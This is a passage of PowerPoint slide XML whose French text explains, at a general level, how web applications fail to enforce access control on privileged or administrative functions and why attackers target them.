                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>privilégiée</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Si </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>l’accès</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>est</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>autorisé</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>cela</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>signifie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>que</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>utilisateurs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>peuvent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>accéder</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> à des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>fonctionnalités</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>privées</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> non protégées.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just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Les applications ne </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>protègent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> pas </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>toujours</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>correctement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>certaines</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>fonctionnalités</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Parfois</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, les protections de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>niveau</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>fonctionnel</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sont</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>gérées</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> par configuration et le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>système</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>est</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> mal </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>configuré</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Parfois</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>développeurs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>oublient</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>d’intégrer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>vérifications</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>logicielles</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>adéquates</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Détecter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>telles</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>vulnérabilités</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>est</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>aisé</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. La </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>tâche</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> la plus </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>difficile</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>consiste</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> à identifier les URLs </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>fonctionnalités</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>devant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>être</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>testées</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a: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just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Ces</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>vulnérabilités</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>permettent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> à un </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>attaquant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>d’accéder</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>fonctionnalités</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> non </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>autorisées</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Les</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>fonctionnalités</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>d’administration</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sont</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>cibles</a:t>
                      </a:r>
                      <a:r>
